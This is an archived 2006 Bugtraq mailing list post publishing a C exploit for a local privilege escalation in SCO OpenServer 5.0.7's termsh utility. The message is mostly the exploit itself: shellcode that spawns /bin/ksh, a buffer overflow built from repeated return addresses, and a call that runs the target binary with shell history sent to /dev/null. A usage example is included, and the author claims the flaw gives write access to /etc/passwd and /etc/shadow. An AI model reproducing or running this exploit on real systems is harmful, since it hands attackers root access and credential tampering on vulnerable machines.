lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <BAY114-F82FC9BF6F8E0A9000744FC22D0@phx.gbl>
Date: Mon, 02 Jan 2006 23:43:53 +0000
From: "rod hedor" <rodhedor@...mail.com>
To: news@...uriTeam.com, news@...urityfocus.com,
	bugtraq@...urityfocus.com, david@...temsecure.org, DLL3_M@...OO.COM,
	phr4xz@...il.com
Subject: SCO Openserver 5.0.x  exploit


  hi all

I  RoD hEDoR

my web http://www.lezr.com/vb
------------[L - G - H]----------------
SCO Openserver 5.0.x  exploit

attacker  allowing for  use this
flaw to gain write access to /etc/passwd or /etc/shadow

#include <stdio.h>
#include <stdlib.h>

char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90"
	         "\x68\xff\xf8\xff\x3c\x6a\x65\x89"
		 "\xe6\xf7\x56\x04\xf6\x16\x31\xc0"
		 "\x50\x68""/ksh""\x68""/bin""\x89"
		 "\xe3\x50\x50\x53\xb0\x3b\xff\xd6";

int main(int argc,char* argv[])
{
	char* buffer;
	char* arg = "-o";
	char *env[] = {"HISTORY=/dev/null",NULL};
	long eip,ptr;
	int i;
        printf("[ SCO Openserver 5.0.7 termsh local privilege escalation 
exploit\n");
        if(argc < 2)
        {
                printf("[ Error  : [path]\n[ Example: %s 
/opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh\n",argv[0]);
                exit(0);
        }
        eip = 0xa2080853;
        buffer = malloc(7449 + strlen(shellcode));
	memset(buffer,'\x00',7449 + strlen(shellcode));
        ptr = (long)buffer + strlen(shellcode);
	strncpy(buffer,shellcode,strlen(shellcode));
        for(i = 1;i <= 1862;i++)
        {
		memcpy((char*)ptr,(char*)&eip,4);
		ptr = ptr + 4;
        }
        execle(argv[1],argv[1],arg,buffer,NULL,env);
        exit(0);
}

_________________________________________________________________
Don't just search. Find. Check out the new MSN Search! 
http://search.msn.click-url.com/go/onm00200636ave/direct/01/



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ